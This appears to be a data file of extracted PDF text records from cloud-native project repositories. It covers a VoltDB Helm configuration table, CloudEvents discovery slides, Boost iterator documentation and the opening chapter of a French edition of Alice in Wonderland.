min-\nutes/hours/days\"\"\n.dr.connection.enabled Specifies whether disaster recov-\nery is enabledfalse\n.dr.connection.source If role is replica or xdcr: list of\nhost names or IP addresses of re-\nmote node(s)\"\"\n.dr.connection.preferredSource Cluster ID of preferred source \"\"\n.dr.connection.ssl Certificate file path for DR con-\nsumer (replica or xdcr mode), de-\nfaults to truststore.file location /\netc/voltdb/ssl/certificate.txt when\nSSL is enabled, otherwise it must\nbe specified\"\"\n.dr.consumerlimit.maxsize Enable DR consumer flow con-\ntrol either maxsize or maxbuffers\nmust be specified maxsize can be\nspecified as 50m, 1g or just num-\nber for bytes\"\"\n.dr.consumerlimit.maxbuffers Enable DR consumer flow con-\ntrol either maxsize or maxbuffers\nmust be specified\"\"\n.export.configurations List of export configurations [ ]\n.import.configurations List of import configurations [ ]\n.avro.namespace Avro namespace \"\"\n.avro.registry Avro registry URL \"\"\n.avro.prefix Avro configuration prefix \"\"\n.avro.properties Avro configuration properties [ ]\n.topics.threadpool Kafka topics threadpool to use ``\n.topics.enabled Kafka topics enabled or not true\n.topics.broker Kafka topics broker configuration ``\n.topics.broker.properties Kafka topics broker configuration\nproperties[ ]\n43VoltDB Helm Properties\nParameter Description Default\n.topics.topic List of topics [ ]\n.topics.topic.name topic name ``\n.topics.topic.procedure Procedure to invoke upon getting\nmessage``\n.topics.topic.format Format of topic message ``\n.topics.topic.retention Topic retention policy ``\n.topics.topic.opaque Is this an opaque topic false\n.topics.topic.allow List of roles allowed to access the\ntopic``\n.topics.topic.priority Priority for topics requests (if pri-\nority scheduling is enabled)4\n.topics.topic.properties Topic configuration properties [ ]\n.httpd.enabled Determines if HTTP API daemon\nis enabledtrue\n.httpd.jsonapi.enabled Determines if jSON over HTTP\nAPI is enabledtrue\n.paths.commandlog.path Directory path for command log /pvc/voltdb/voltdbroot/\ncommand_log\n.paths.commandlogsnapshot.path Directory path for command log\nsnapshot/pvc/voltdb/voltdbroot/\ncommand_log_snapshot\n.paths.droverflow.path Directory path for disaster recov-\nery overflow/pvc/voltdb/voltdbroot/\ndr_overflow\n.paths.exportcursor.path Directory path for export cursors /pvc/voltdb/voltdbroot/\nexport_cursor\n.paths.exportoverflow.path Directory path for export over-\nflow/pvc/voltdb/voltdbroot/\nexport_overflow\n.paths.largequeryswap.path Directory path for large query\nswapping/pvc/voltdb/voltdbroot/\nlarge_query_swap\n.paths.snapshots.path Directory path for snapshots.\nMust not be located in a read-only\nroot directory of mounted storage\n(as init --force will rename exist-\ning snapshot folder). Use a subdi-\nrectory./pvc/voltdb/voltdbroot/snapshots\n.security.enabled Controls whether user-based au-\nthentication and authorization are\nusedfalse\n.security.provider Allows use of external Kerberos\nprovider; one of: hash, kerberoshash\n.snapshot.enabled Enable/disable periodic automatic\nsnapshotstrue\n.snapshot.frequency Frequency of automatic snapshots\n(in s,m,h)24h\n.snapshot.prefix Unique prefix for snapshot files AUTOSNAP\n44VoltDB Helm Properties\nParameter Description Default\n.snapshot.retain Number of snapshots to retain 2\n.snmp.enabled Enables or disables use of SNMP false\n.snmp.target Host name or IP address, and op-\ntional port (default 162), for SN-\nMP server\"\"\n.snmp.authkey SNMPv3 authentication key if\nprotocol is not NoAuthvoltdbauthkey\n.snmp.authprotocol SNMPv3 authentication protocol.\nOne of: SHA, MD5, NoAuthSHA\n.snmp.community Name of SNMP community public\n.snmp.privacykey SNMPv3 privacy key if protocol\nis not NoPrivvoltdbprivacykey\n.snmp.privacyprotocol SNMPv3 privacy protocol. One\nof: AES, DES, 3DES, AES192,\nAES256, NoPrivAES\n.snmp.username Username for SNMPv3 authenti-\ncation; else SNMPv2c is used\"\"\n.ssl.enabled Enables TLS/SSL security for the\nHTTP port (default 8080, 8443)false\n.ssl.external Extends TLS/SSL security to\nall external ports (default admin\n21211, client 21212)false\n.ssl.internal Extends TLS/SSL security to the\ninternal port (default 3021)false\n.ssl.dr Extends TLS/SSL security to the\nDR port (5555)false\n.ssl.keystore.file Keystore file to mount at the key-\nstore path\"\"\n.ssl.keystore.password Password for VoltDB keystore \"\"\n.ssl.truststore.file Truststore file to mount at the\ntruststore path\"\"\n.ssl.truststore.password Password for VoltDB truststore \"\"\n.systemsettings.elastic.duration Target value for the length of\ntime each rebalance transaction\nwill take (milliseconds)50\n.systemsettings.elastic.throughput Target value for rate of data pro-\ncessing by rebalance transactions\n(MB)2\n.systemsettings.flushinterval\n.minimumInterval between checking for\nneed to flush (milliseconds)1000\n.systemsettings.flushinterval.dr\n.intervalInterval for flushing DR data (mil-\nliseconds)1000\n.systemsettings.flushinterval\n.export.intervalInterval for flushing export data\n(milliseconds)4000\n45VoltDB Helm Properties\nParameter Description Default\n.systemsettings.procedure.loginfo Threshold for long-running task\ndetection (milliseconds)10000\n.systemsettings.procedure\n.copyparametersif set, mutable array parameters\nshould be copied before process-\ningtrue\n.systemsettings.priorities.enabled Enables priority scheduling of re-\nquests by VoltDB cluster (true/\nfalse)false\n.systemsettings.priorities\n.maxwaitModifies priority scheduling by\nsetting a limit on time waiting\nwhile higher priority requests ex-\necute (millisecs)1000\n.systemsettings.priorities.batch Modifies priority scheduling algo-\nrithm to execute multiple requests\nbefore rescheduling25\n.systemsettings.priorities.dr\n.priorityPriority for DR requests (1-8, 1 is\nhighest priority)5\n.systemsettings.priorities\n.snapshot.priorityPriority for snapshot requests\n(1-8, 1 is highest priority)6\n.systemsettings.resourcemonitor\n.frequencyResource Monitor interval be-\ntween resource checks (seconds)60\n.systemsettings.resourcemonitor\n.memorylimit.sizeLimit on memory use (in GB or as\npercentage)80.00%\n.systemsettings.resourcemonitor\n.memorylimit.alertAlert level for memory use (in GB\nor as percentage)70.00%\n.systemsettings.resourcemonitor\n.disklimit.commandlog.sizeResource Monitor disk limit on\ndisk use (in GB or percentage,\nempty is unlimited)\"\"\n.systemsettings.resourcemonitor\n.disklimit.commandlog.alertResource Monitor alert level for\ndisk use (in GB or as percentage,\nempty is unlimited)\"\"\n.systemsettings.resourcemonitor\n.disklimit.commandlogsnapshot\n.sizeResource Monitor disk limit on\ndisk use (in GB or percentage,\nempty is unlimited)\"\"\n.systemsettings.resourcemonitor\n.disklimit.commandlogsnapshot\n.alertResource Monitor alert level for\ndisk use (in GB or as percentage,\nempty is unlimited)\"\"\n.systemsettings.resourcemonitor\n.disklimit.droverflow.sizeResource Monitor disk limit on\ndisk use (in GB or percentage,\nempty is unlimited)\"\"\n.systemsettings.resourcemonitor\n.disklimit.droverflow.alertResource Monitor alert level for\ndisk use (in GB or as percentage,\nempty is unlimited)\"\"\n.systemsettings.resourcemonitor\n.disklimit.exportoverflow.sizeResource Monitor disk limit on\ndisk use (in GB or percentage,\nempty is unlimited)\"\"\n46VoltDB Helm Properties\nParameter Description Default\n.systemsettings.resourcemonitor\n.disklimit.exportoverflow.alertResource Monitor alert level for\ndisk use (in GB or as percentage,\nempty is unlimited)\"\"\n.systemsettings.resourcemonitor\n.disklimit.snapshots.sizeResource Monitor disk limit on\ndisk use (in GB or percentage,\nempty is unlimited)\"\"\n.systemsettings.resourcemonitor\n.disklimit.snapshots.alertResource Monitor alert level for\ndisk use (in GB or as percentage,\nempty is unlimited)\"\"\n.systemsettings.resourcemonitor\n.disklimit.topicsdata.sizeResource Monitor disk limit on\ndisk use (in GB or percentage,\nempty is unlimited)\"\"\n.systemsettings.resourcemonitor\n.disklimit.topicsdata.alertResource Monitor alert level for\ndisk use (in GB or as percentage,\nempty is unlimited)\"\"\n.systemsettings.snapshot.priority Priority for snapshot work (really\na delay factor; see under system-\nsettings for scheduling priority)6\n.systemsettings.temptables\n.maxsizeLimit the size of temporary data-\nbase tables (MB)100\n.users Define a list of VoltDB users to be\nadded to the deployment[ ]\n47" } ]
{ "category": "App Definition and Development", "file_name": "2021-06-24-DiscoveryOverview.pdf", "project_name": "CloudEvents", "subcategory": "Streaming & Messaging" }
[ { "data": "Where we are with DiscoveryKlaus DeißnerWG-Serverless Meeting, 2021/06/24Purpose of CloudEvents Discovery•Consumers find out… •…what they can subscribe to•What sources are available?•What event types do they provide?•…how they can subscribe•Subscription endpoint•Supported filter dialects•…how they can consume•Protocols•Intermediaries replicate discovery information•Producers register with intermediaries to announcewhat they produceResource Model\nEventsService MetadataSubscription Information{\"id\": \"[a globally unique UUID]\",\"epoch\": \"[discovery entry epoch value]\",\"name\": \"[unique name for this services]\",\"url\": \"[unique URL to this service]\",\"description\": \"[human string]\", ?\"docsurl\": \"[URL reference for human documentation]\", ?\"specversions\": [ \"[ce-specversion value]\" + ],\"subscriptionurl\": \"[URL to which the Subscribe request will be sent]\",\"subscriptionconfig\": { ?\"[key]\": \"[type]\", *},\"subscrioptiondialects\": [ \"[dialect]\" ], ?\"authscope\": \"[string]\", ?\"protocols\": [ \"[string]\" + ],\"events\": [ ?{ *\"type\": \"[ce-type value]\",\"description\": \"[human string]\", ?\"datacontenttype\": \"[ce-datacontenttype value]\", ?\"dataschema\": \"[ce-dataschema URI]\", ?\"dataschematype\": \"[string per RFC 2046]\", ?\"dataschemacontent\": \"[schema]\", ?\"sourcetemplate\": \"[URI template per RFC 6570, level 1]\", ?\"extensions\": [ ?{ *\"name\": \"[CE context attribute name]\",\"type\": \"[CE type string]\",\"specurl\": \"[URL to specification defining the extension]\" ?}]}]}•Single Resource•De-normalized (#630)•Event typenot a separate resource•No re-use of event type definitions across services•Relation to static catalogs?•Subscription information•Attached to Service, but might be different in intermediaries•Mixed in by intermediaries?•What does this mean for epoch?Service•A \"service\" represents the entity which manages one or more eventsourcesand is associated withproducersthat are responsible for the generation of events. (spec)•Terminology discussion:•Source, producer, provider… Service? (#620)•Questions•What does this mean for different architectures and tenancy models?•Regions, availability zones, clusters, namespaces…•Service vs. service instance•Extreme case:Each tenant of a service may be differentIdentifying a Service•id•UUID, assigned by the Discovery Endpoint•MUST NOT change•name•This value MUST be unique (case insensitive) within the scope of this Discovery Endpoint•url•This value MUST be usable in subsequent requests, by authorized clients, to retrieve this Service entity.•epoch•The only requirement is that the value MUST always increase each time the Service Entry is updatedDiscovery API (GET)•GET•/services•/services/{id}•/services?name={name} (#682 Add support for partial name matching)Management APIPOSTPUTDELETE/services/services/{id}/services/{id}/services?import/services/{id}?import•POST works according to all-or-nothing principle•“import” keeps service id, takes epoch into account•Question: does PUT and ?import fulfill the idempotency requirementsof PUT?Status / Topics•Issues•Scenarios•Extend idea of sourcetemplate to other attributes?•“Usability”•Relation to other standards like OpenAPI and AsyncAPIBrainstorming•Discovery events instead of OR in addition to management API (#829)•Apply conceptsfrom schema registry•URIs•Authority•Replication•Different protocol bindings (simple for discovery events)•Service or “package” document•Documents are flexible•Can be stored together with code" } ]
{ "category": "App Definition and Development", "file_name": "counting_iterator.pdf", "project_name": "ArangoDB", "subcategory": "Database" }
[ { "data": "Counting Iterator\nAuthor : David Abrahams, Jeremy Siek, Thomas Witt\nContact : dave@boost-consulting.com ,jsiek@osl.iu.edu ,witt@ive.uni-hannover.de\nOrganization :Boost Consulting , Indiana University Open Systems Lab , University of\nHanover Institute for Transport Railway Operation and Construction\nDate : 2004-11-01\nCopyright : Copyright David Abrahams, Jeremy Siek, and Thomas Witt 2003.\nabstract: How would you fill up a vector with the numbers zero through one hundred\nusing std::copy() ? The only iterator operation missing from builtin integer types is\nanoperator*() that returns the current value of the integer. The counting iterator\nadaptor adds this crucial piece of functionality to whatever type it wraps. One can use\nthe counting iterator adaptor not only with integer types, but with any incrementable\ntype.\ncounting_iterator adapts an object by adding an operator* that returns the current\nvalue of the object. All other iterator operations are forwarded to the adapted object.\nTable of Contents\ncounting_iterator synopsis\ncounting_iterator requirements\ncounting_iterator models\ncounting_iterator operations\nExample\ncounting_iterator synopsis\ntemplate <\nclass Incrementable\n, class CategoryOrTraversal = use_default\n, class Difference = use_default\n>\nclass counting_iterator\n{\npublic:\ntypedef Incrementable value_type;\ntypedef const Incrementable& reference;\ntypedef const Incrementable* pointer;\ntypedef /* see below */ difference_type;\ntypedef /* see below */ iterator_category;\n1counting_iterator();\ncounting_iterator(counting_iterator const& rhs);\nexplicit counting_iterator(Incrementable x);\nIncrementable const& base() const;\nreference operator*() const;\ncounting_iterator& operator++();\ncounting_iterator& operator--();\nprivate:\nIncrementable m_inc; // exposition\n};\nIf the Difference argument is use_default then difference_type is an unspecified signed integral\ntype. Otherwise difference_type isDifference .\niterator_category is determined according to the following algorithm:\nif (CategoryOrTraversal is not use_default)\nreturn CategoryOrTraversal\nelse if (numeric_limits<Incrementable>::is_specialized)\nreturn iterator-category (\nrandom_access_traversal_tag, Incrementable, const Incrementable&)\nelse\nreturn iterator-category (\niterator_traversal<Incrementable>::type,\nIncrementable, const Incrementable&)\n[Note: implementers are encouraged to provide an implementation of operator- and a dif-\nference_type that avoids overflows in the cases where std::numeric_limits<Incrementable>::is_specialized\nis true.]\ncounting_iterator requirements\nThe Incrementable argument shall be Copy Constructible and Assignable.\nIfiterator_category is convertible to forward_iterator_tag orforward_traversal_tag , the\nfollowing must be well-formed:\nIncrementable i, j;\n++i; // pre-increment\ni == j; // operator equal\nIfiterator_category is convertible to bidirectional_iterator_tag orbidirectional_traversal_tag ,\nthe following expression must also be well-formed:\n--i\nIfiterator_category is convertible to random_access_iterator_tag orrandom_access_traversal_tag ,\nthe following must must also be valid:\ncounting_iterator::difference_type n;\ni += n;\nn = i - j;\ni < j;\n2counting_iterator models\nSpecializations of counting_iterator model Readable Lvalue Iterator. In addition, they model the con-\ncepts corresponding to the iterator tags to which their iterator_category is convertible. Also, if Cat-\negoryOrTraversal is not use_default then counting_iterator models the concept corresponding to\nthe iterator tag CategoryOrTraversal . Otherwise, if numeric_limits<Incrementable>::is_specialized ,\nthen counting_iterator models Random Access Traversal Iterator. Otherwise, counting_iterator\nmodels the same iterator traversal concepts modeled by Incrementable .\ncounting_iterator<X,C1,D1> is interoperable with counting_iterator<Y,C2,D2> if and only if\nXis interoperable with Y.\ncounting_iterator operations\nIn addition to the operations required by the concepts modeled by counting_iterator ,counting_iterator\nprovides the following operations.\ncounting_iterator();\nRequires: Incrementable is Default Constructible.\nEffects: Default construct the member m_inc .\ncounting_iterator(counting_iterator const& rhs);\nEffects: Construct member m_inc from rhs.m_inc .\nexplicit counting_iterator(Incrementable x);\nEffects: Construct member m_inc from x.\nreference operator*() const;\nReturns: m_inc\ncounting_iterator& operator++();\nEffects: ++m_inc\nReturns: *this\ncounting_iterator& operator--();\nEffects: --m_inc\nReturns: *this\nIncrementable const& base() const;\nReturns: m_inc\ntemplate <class Incrementable>\ncounting_iterator<Incrementable> make_counting_iterator(Incrementable x);\nReturns: An instance of counting_iterator<Incrementable> with current constructed\nfrom x.\n3Example\nThis example fills an array with numbers and a second array with pointers into the first array, using\ncounting_iterator for both tasks. Finally indirect_iterator is used to print out the numbers into\nthe first array via indirection through the second array.\nint N = 7;\nstd::vector<int> numbers;\ntypedef std::vector<int>::iterator n_iter;\nstd::copy(boost::counting_iterator<int>(0),\nboost::counting_iterator<int>(N),\nstd::back_inserter(numbers));\nstd::vector<std::vector<int>::iterator> pointers;\nstd::copy(boost::make_counting_iterator(numbers.begin()),\nboost::make_counting_iterator(numbers.end()),\nstd::back_inserter(pointers));\nstd::cout << \"indirectly printing out the numbers from 0 to \"\n<< N << std::endl;\nstd::copy(boost::make_indirect_iterator(pointers.begin()),\nboost::make_indirect_iterator(pointers.end()),\nstd::ostream_iterator<int>(std::cout, \" \"));\nstd::cout << std::endl;\nThe output is:\nindirectly printing out the numbers from 0 to 7\n0 1 2 3 4 5 6\nThe source code for this example can be found here.\n4" } ]
{ "category": "App Definition and Development", "file_name": "zip_iterator.pdf", "project_name": "ArangoDB", "subcategory": "Database" }
[ { "data": "Zip Iterator\nAuthor : David Abrahams, Thomas Becker\nContact : dave@boost-consulting.com ,thomas@styleadvisor.com\nOrganization :Boost Consulting ,Zephyr Associates, Inc.\nDate : 2004-11-01\nCopyright : Copyright David Abrahams and Thomas Becker 2003.\nabstract: The zip iterator provides the ability to parallel-iterate over several controlled se-\nquences simultaneously. A zip iterator is constructed from a tuple of iterators. Moving\nthe zip iterator moves all the iterators in parallel. Dereferencing the zip iterator returns\na tuple that contains the results of dereferencing the individual iterators.\nTable of Contents\nzip_iterator synopsis\nzip_iterator requirements\nzip_iterator models\nzip_iterator operations\nExamples\nzip_iterator synopsis\ntemplate<typename IteratorTuple>\nclass zip_iterator\n{\npublic:\ntypedef /* see below */ reference;\ntypedef reference value_type;\ntypedef value_type* pointer;\ntypedef /* see below */ difference_type;\ntypedef /* see below */ iterator_category;\nzip_iterator();\nzip_iterator(IteratorTuple iterator_tuple);\ntemplate<typename OtherIteratorTuple>\nzip_iterator(\nconst zip_iterator<OtherIteratorTuple>& other\n, typename enable_if_convertible<\nOtherIteratorTuple\n1, IteratorTuple>::type* = 0 // exposition only\n);\nconst IteratorTuple& get_iterator_tuple() const;\nprivate:\nIteratorTuple m_iterator_tuple; // exposition only\n};\ntemplate<typename IteratorTuple>\nzip_iterator<IteratorTuple>\nmake_zip_iterator(IteratorTuple t);\nThe reference member of zip_iterator is the type of the tuple made of the reference types of\nthe iterator types in the IteratorTuple argument.\nThe difference_type member of zip_iterator is the difference_type of the first of the iterator\ntypes in the IteratorTuple argument.\nThe iterator_category member of zip_iterator is convertible to the minimum of the traversal\ncategories of the iterator types in the IteratorTuple argument. For example, if the zip_iterator holds\nonly vector iterators, then iterator_category is convertible to boost::random_access_traversal_tag .\nIf you add a list iterator, then iterator_category will be convertible to boost::bidirectional_traversal_tag ,\nbut no longer to boost::random_access_traversal_tag .\nzip_iterator requirements\nAll iterator types in the argument IteratorTuple shall model Readable Iterator.\nzip_iterator models\nThe resulting zip_iterator models Readable Iterator.\nThe fact that the zip_iterator models only Readable Iterator does not prevent you from modifying\nthe values that the individual iterators point to. The tuple returned by the zip_iterator ’soperator* is\na tuple constructed from the reference types of the individual iterators, not their value types. For exam-\nple, if zip_it is azip_iterator whose first member iterator is an std::vector<double>::iterator ,\nthen the following line will modify the value which the first member iterator of zip_it currently points\nto:\nzip_it->get<0>() = 42.0;\nConsider the set of standard traversal concepts obtained by taking the most refined standard traversal\nconcept modeled by each individual iterator type in the IteratorTuple argument.The zip_iterator\nmodels the least refined standard traversal concept in this set.\nzip_iterator<IteratorTuple1> is interoperable with zip_iterator<IteratorTuple2> if and only\nifIteratorTuple1 is interoperable with IteratorTuple2 .\nzip_iterator operations\nIn addition to the operations required by the concepts modeled by zip_iterator ,zip_iterator pro-\nvides the following operations.\nzip_iterator();\nReturns: An instance of zip_iterator with m_iterator_tuple default constructed.\n2zip_iterator(IteratorTuple iterator_tuple);\nReturns: An instance of zip_iterator with m_iterator_tuple initialized to itera-\ntor_tuple .\ntemplate<typename OtherIteratorTuple>\nzip_iterator(\nconst zip_iterator<OtherIteratorTuple>& other\n, typename enable_if_convertible<\nOtherIteratorTuple\n, IteratorTuple>::type* = 0 // exposition only\n);\nReturns: An instance of zip_iterator that is a copy of other .\nRequires: OtherIteratorTuple is implicitly convertible to IteratorTuple .\nconst IteratorTuple& get_iterator_tuple() const;\nReturns: m_iterator_tuple\nreference operator*() const;\nReturns: A tuple consisting of the results of dereferencing all iterators in m_iterator_tuple .\nzip_iterator& operator++();\nEffects: Increments each iterator in m_iterator_tuple .\nReturns: *this\nzip_iterator& operator--();\nEffects: Decrements each iterator in m_iterator_tuple .\nReturns: *this\ntemplate<typename IteratorTuple>\nzip_iterator<IteratorTuple>\nmake_zip_iterator(IteratorTuple t);\nReturns: An instance of zip_iterator<IteratorTuple> with m_iterator_tuple initial-\nized to t.\ntemplate<typename IteratorTuple>\nzip_iterator<IteratorTuple>\nmake_zip_iterator(IteratorTuple t);\nReturns: An instance of zip_iterator<IteratorTuple> with m_iterator_tuple initial-\nized to t.\nExamples\nThere are two main types of applications of the zip_iterator . The first one concerns runtime efficiency:\nIf one has several controlled sequences of the same length that must be somehow processed, e.g., with\nthefor_each algorithm, then it is more efficient to perform just one parallel-iteration rather than\nseveral individual iterations. For an example, assume that vect_of_doubles and vect_of_ints are\ntwo vectors of equal length containing doubles and ints, respectively, and consider the following two\niterations:\n3std::vector<double>::const_iterator beg1 = vect_of_doubles.begin();\nstd::vector<double>::const_iterator end1 = vect_of_doubles.end();\nstd::vector<int>::const_iterator beg2 = vect_of_ints.begin();\nstd::vector<int>::const_iterator end2 = vect_of_ints.end();\nstd::for_each(beg1, end1, func_0());\nstd::for_each(beg2, end2, func_1());\nThese two iterations can now be replaced with a single one as follows:\nstd::for_each(\nboost::make_zip_iterator(\nboost::make_tuple(beg1, beg2)\n),\nboost::make_zip_iterator(\nboost::make_tuple(end1, end2)\n),\nzip_func()\n);\nA non-generic implementation of zip_func could look as follows:\nstruct zip_func :\npublic std::unary_function<const boost::tuple<const dou-\nble&, const int&>&, void>\n{\nvoid operator()(const boost::tuple<const double&, const int&>& t) const\n{\nm_f0(t.get<0>());\nm_f1(t.get<1>());\n}\nprivate:\nfunc_0 m_f0;\nfunc_1 m_f1;\n};\nThe second important application of the zip_iterator is as a building block to make combining\niterators. A combining iterator is an iterator that parallel-iterates over several controlled sequences\nand, upon dereferencing, returns the result of applying a functor to the values of the sequences at the\nrespective positions. This can now be achieved by using the zip_iterator in conjunction with the\ntransform_iterator .\nSuppose, for example, that you have two vectors of doubles, say vect_1 andvect_2 , and you need\nto expose to a client a controlled sequence containing the products of the elements of vect_1 and\nvect_2 . Rather than placing these products in a third vector, you can use a combining iterator that\ncalculates the products on the fly. Let us assume that tuple_multiplies is a functor that works\nlike std::multiplies , except that it takes its two arguments packaged in a tuple. Then the two\niterators it_begin andit_end defined below delimit a controlled sequence containing the products of\nthe elements of vect_1 andvect_2 :\ntypedef boost::tuple<\nstd::vector<double>::const_iterator,\nstd::vector<double>::const_iterator\n> the_iterator_tuple;\n4typedef boost::zip_iterator<\nthe_iterator_tuple\n> the_zip_iterator;\ntypedef boost::transform_iterator<\ntuple_multiplies<double>,\nthe_zip_iterator\n> the_transform_iterator;\nthe_transform_iterator it_begin(\nthe_zip_iterator(\nthe_iterator_tuple(\nvect_1.begin(),\nvect_2.begin()\n)\n),\ntuple_multiplies<double>()\n);\nthe_transform_iterator it_end(\nthe_zip_iterator(\nthe_iterator_tuple(\nvect_1.end(),\nvect_2.end()\n)\n),\ntuple_multiplies<double>()\n);\n5" } ]
{ "category": "App Definition and Development", "file_name": "Carroll_AliceAuPaysDesMerveilles.pdf", "project_name": "ShardingSphere", "subcategory": "Database" }
[ { "data": " \nLewis Carroll \nALICE AU PAYS \nDES MERVEILLES \n(1865 ) \n Édition du groupe « Ebooks libres et gratuits » \n \n \n \n \n \n Table des matières \n \nCHAPITRE I Descente dans le terrier du lapin ................. 4 \nCHAPI TRE II La mare de larmes ................................ ...... 16 \nCHAPITRE III Une course au « Caucus » et une longue \nhistoire ................................ ................................ ................... 28 \nCHAPITRE IV Le lapin fait intervenir le petit Bill .......... 39 \nCHAPITRE V Les conseils de la Chenille ......................... 53 \nCHAPITRE VI Porc et poivre ................................ ............ 68 \nCHAPITRE VII Un thé chez les fous ................................ 87 \nCHAPITRE VIII Le terrain de croquet de la Reine ...... 104 \nCHAPITRE IX H istoire de la Simili -Tortue ................. 121 \nCHAPITRE X Le quadrille des homards ....................... 137 \nCHAPITRE XI Qui a dérobé les tartes ? ....................... 152 \nCHAPITRE XII La déposition d ’Alice ........................... 166 \nÀ propos de cette édition électronique .......................... 180 \n Alice au pays des merveilles - Descente dans le terrier du lapin \n– 4 – CHAPITRE I \nDescente dans le terrier du lapin \nAlice commençait à se sentir très lasse de rester assise à \ncôté de sa sœur , sur le talus , et de n ’avoir rien à faire : une fois \nou deux , elle avait jeté un coup d ’œil sur le livre que lisait sa \nsœur ; mais il ne contenait ni images ni d ialogues : « Et, \npensait Alice , à quoi peut bien servir un livre où il n ’y a ni \nimages ni dialogues ? » \n \n Alice au pays des merveilles - Descente dans le terrier du lapin \n– 5 – \nElle se demandait (dans la mesure où elle était capable de \nréfléchir , car elle se sentait tout endormie et toute stupide à \ncause de la chaleur ) si le plaisir de tresser une guirlande de \npâquerettes valait la peine de se lever et d ’aller cueillir les \npâquerettes , lorsque , brusquement , un Lapin Blanc aux yeux \nroses passa en courant tout près d ’elle. \n \n \n \nCeci n ’avait rien de particulièrement remarquable ; et \nAlice ne trouva pas non plus tellement bizarre d ’entendre le \nLapin se dire à mi -voix : « Oh, mon Dieu ! Oh, mon Dieu ! Je \nvais être en retard ! » (Lorsqu ’elle y réfléchit par la suite , il lui \nvint à l ’esprit qu ’elle aurait dû s ’en étonner , mais , sur l e \nmoment , cela lui sembla tout naturel ) ; cependant , lorsque le \nLapin tira bel et bien une montre de la poche de son gilet , Alice au pays des merveilles - Descente dans le terrier du lapin \n– 6 – regarda l ’heure , et se mit à courir de plus belle , Alice se dressa \nd’un bond , car, tout à coup , l’idée lui était venue qu ’elle \nn’avait jamais vu de lapin pourvu d ’une poche de gilet , ni \nd’une montre à tirer de cette poche . Dévorée de curiosité , elle \ntraversa le champ en courant à sa poursuite , et eut la chance \nd’arriver juste à temps pour le voir s ’enfoncer comme une \nflèche dans un lar ge terrier placé sous la haie . \n \nUn instant plus tard , elle y pénétrait à son tour , sans se \ndemander une seule fois comment diable elle pourrait bien en \nsortir . \n \nLe terrier était d ’abord creusé horizontalement comme \nun tunnel , puis il présentait une pente s i brusque et si raide \nqu’Alice n ’eut même pas le temps de songer à s ’arrêter avant \nde se sentir tomber dans un puits apparemment très profond . \n \nSoit que le puits fût très profond , soit que Alice tombât \ntrès lentement , elle s ’aperçut qu ’elle avait le temps , tout en \ndescendant , de regarder autour d ’elle et de se demander ce \nqui allait se passer . D’abord , elle essaya de regarder en bas \npour voir où elle allait arriver , mais il faisait trop noir pour \nqu’elle pût rien distinguer . Ensuite , elle examina les parois du \npuits , et remarqua qu ’elles étaient garnies de placards et \nd’étagères ; par endroits , des cartes de géographie et des \ntableaux se trouvaient accrochés à des pitons . En passant , elle \nprit un pot sur une étagère ; il portait une étiquette sur \nlaquelle on lisait : MARMELADE D ’ORANGES , mais , à la \ngrande déception d ’Alice , il était vide . Elle ne voulut pas le \nlaisser tomber de peur de tuer quelqu ’un et elle s ’arrangea \npour le poser dans un placard devant lequel elle passait , tout \nen tombant . Alice au pays des merveilles - Descente dans le terrier du lapin \n– 7 – \n \n \n« Ma foi ! songea -t-elle, après une chute pareille , cela me \nsera bien égal , quand je serai à la maison , de dégringoler dans \nl’escalier ! Ce qu ’on va me trouver courageuse ! Ma parole , \nmême si je tombais du haut du toit , je n ’en parlerais à \npersonne ! » (Supposition de s plus vraisemblables , en effet .) \n \nPlus bas , encore plus bas , toujours plus bas . Est-ce que \ncette chute ne finirait jamais ? « Je me demande combien de \nkilomètres j ’ai pu parcourir ? dit-elle à haute voix . Je ne dois \npas être bien loin du centre de la terr e. Voyons : cela ferait " } ]